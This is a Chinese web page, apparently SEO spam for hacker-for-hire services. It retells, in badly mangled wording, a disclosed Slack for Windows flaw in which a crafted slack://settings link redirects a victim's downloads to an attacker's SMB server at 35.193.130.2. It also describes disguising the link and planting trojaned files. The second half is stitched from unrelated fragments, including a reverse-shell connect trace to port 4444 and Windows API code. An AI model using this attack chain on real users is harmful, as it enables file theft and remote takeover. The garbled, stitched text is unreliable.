黑客诚信接单:使用Slack应用程序盗取Slack用户的下载文件

本文中，Tenable安全团队研讨员David Wells同享了Windows版别Slack终端使用程序的一个缝隙，通过对Slack下载功用的使用，能够操控Slack受害者的下载文件存储设置，直接隐秘盗取Slack受害者的下载文件，深化使用可形成对受害者体系的长途操控。现在，该缝隙现已被Slack修正，并在最新的Slack v3.4.0版别中释放了补丁。
缝隙阐明
该缝隙原理在于，侵犯者只需在Slack群组中发送一条通过假装结构的链接，上钩的受害者一旦点击加载，其Slack使用程序的下载文档存储方位就会发作更改，自动变为侵犯者操控的长途 *** B文件同享服务体系，之后，受害者在Slack使用中下载的恣意文件都会被“悄然”地存储（上传）到这个侵犯者设置的长途 *** B同享体系中。只有当受害者发现文件下载方位的反常后，手动修正回来，才干及时止损，堵截这种“保密”行为。
当然，通过这种 *** ，侵犯者不仅能隐秘盗取受害者的下载文档，还能往下载过的文档中放入绑缚了木马的歹意文档，当受害得通过Slack翻开这种歹意文档之后，其电脑体系就被侵犯者长途操控了。
缝隙原因在于，Slack使用程序对其自身功用 slack:// links（加链接） *** ，以及可点击链接的不妥处理。以下是作者相关的缝隙发现同享。处理计划
逆向剖析Slack功用设置
Slack是依据Electron架构的使用程序，逆向剖析相对简单，作为Slack用户的我来说，我觉得Slack的“slack://”后加超链接的功用有点意思，其间或许存在安全隐患。结合逆向剖析效果，通过一番研讨，我在Slack逆向效果中找到了与“slack://”links功用对应的，用来处理这以后链接（links）的代码模块 - protocol-link.ts，从中能够得知，设置 slack://setting+link 款式，点击之后就能使Slack程序的某些功用发作更改。

而在另一个模块Settings-Reducer.ts中，能够发现Slack功用设置更改的全部相关代码：

也就是说，能够通过slack://settings+link的 *** ，完成对Slack程序全部功用设置的更改。
完成Slack下载文档存储方位的隐秘更改
依据以上逆向发现，我发现可经由“PrefSSBFileDownloadPath”参数设置来对Slack文档下载存储方位进行更改，通过对它的设置，能够完成点击 slack://settings+link *** 结构的链接就能更改Slack下载文档存储方位，如下：
“slack://settings/?update={‘PrefSSBFileDownloadPath’:’
’}”
其间的
部份是能够精心结构的一点。但不巧的是，Slack对以上的链接结构是具有特别字符过滤机制的，其间的冒号“：”标明这需求供应一个本地的根目录驱动途径。之后，我想到了 *** B同享 *** ，这种 *** 不需求供应本地根目录驱动途径，但却能够契合其存储方位要求，完全能够绕过Slack在此的过滤防护。
所以，我自己架设了一个长途 *** B服务体系35.193.130.2，然后slack://settings+link就变为：

这样一来，当我把这个slack://setting例如，UDP分组或许生成ICMP差错。这些差错一般封装在ICMP有用负载，IP报头加上违规数据包的下一个64字节内。图1闪现了主机B拒绝封闭端口上的数据包的这种行为：s+link发送给其它Slack用户后，一旦对方点击，其Slack使用程序中的文档下载存储方位就自动变为35.193.130.2apt：

当然，当对方执行了某个文档的下载后：

就会自动把该文档存储（上传）到 *** 控的35.193.130.2中来：

缝隙使用的侵犯途径
从实际环境来说，slack://settings+link应该通过必要的编码或含糊，要不然某些有安全意识的Slack用户一眼就会识破，不会点击它。针对这种情况，有两种解决 *** 。
参加同一Slack群组的用户
这种在同一Slack群组中的成员用户，怎样来完成这种侵犯呢？在研讨了Slack的阐明文档之后，我发现Slack制止在群组消息中呈现超链接相关字眼：

但通过对Slack API文档的阅览剖析，我发现能够在附件“attachments”功用中来完成超链接的结构，具体 *** 是在Slack的POST提交恳求中，增加一个名为“attachment” 的恳求，以合法网站 *** 把slack://settings+link嵌入到其间，结构出我们想要的设置更改链接，如下：

当这条POST *** 的消息提交到Slack群组中后，它对Slack用户显出的是合法的链接“http://google.com” ，但其实点击之后，加载的却是我们结构的设置更改链接：

[1] [2]  下一页

反编译后进入到test文件夹下的/smali/com/example/hello *** ali中，能够看到有两个MainActivity的 *** ali文件：connect（3，{sa_family = AF_INET，sin_port = htons（4444），sin_addr = inet_addr（“192.168.139.130”）}，16）= 0后边的章节则会介绍各种组件的细节，包括数据接入和准备引擎，处理引擎，实时/离线配备，机器学习模型和不同运用，交互等。黑客诚信接单:使用Slack应用程序盗取Slack用户的下载文件

扫描效果中返回了靶机中的两个用户Michael和Steven。

一、概述

在具体通讯协议的选择时，考虑了MQTT和WebSocket。两者比较，前者有老到的开源组件，用很少的开发就能够结束设备接入、消息路由、数据存储、自动订阅 、情况监控等功用；而后者结束相同的功用，需求额外的作业量。但是考虑到WebSocket依据HTTP/HTTPS，对防火墙更和睦，我们选择了WebSocket作为网关与操控器的通讯协议。网关作为WebSocket客户端，操控器作为WebSocket服务端，这样结束了用户侧的防火墙零配备，而依据WebSocket的长联接又能够满足通讯的实时性。 利益：分工了解，作业效率高。G 组的全部权不同

手动注入关于TLNR（Too Long, Not Read）的读者来说，先把答案放在这：是的，但也不尽然。配备kibana的访问地址和端口查看数据库

“超级公司”聘请了我们的渗透检验工程师对其员工进行社会工程学点评，检验的规划是找到全部能盗取秘要资料的 *** ，然后运用员工PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");

就内存自身而言，每秒读写次数是有上限的。其次，核算单元和内存之间的交互，更是一大瓶颈。

黑客诚信接单:使用Slack应用程序盗取Slack用户的下载文件

login_name：用户名

据悉，遭受侵犯的手机都未设备谷歌(微博)5月份发布的针对性安全晋级。伯尼迷你称，由于许多手机根柢未收到该晋级，因此57%的安卓设备都暴露在黑客的魔掌下。

Empire项目在我们的POC东西里，看到了来自于RDP客户端（192.168.190.1）的联接，并且署理向政策服务器发起了联接。

上一年的一月，NetSPI在博客中宣告了一篇博文——《从IOS设备中提取数据》。尽管NetSPI供应了一篇能让这个进程变得十分简略的脚本，但是它只能在iOS7或许更低的版别中运用并且要求要有GDB。0x02 侵犯Messenger
本文标题:黑客诚信接单:使用Slack应用程序盗取Slack用户的下载文件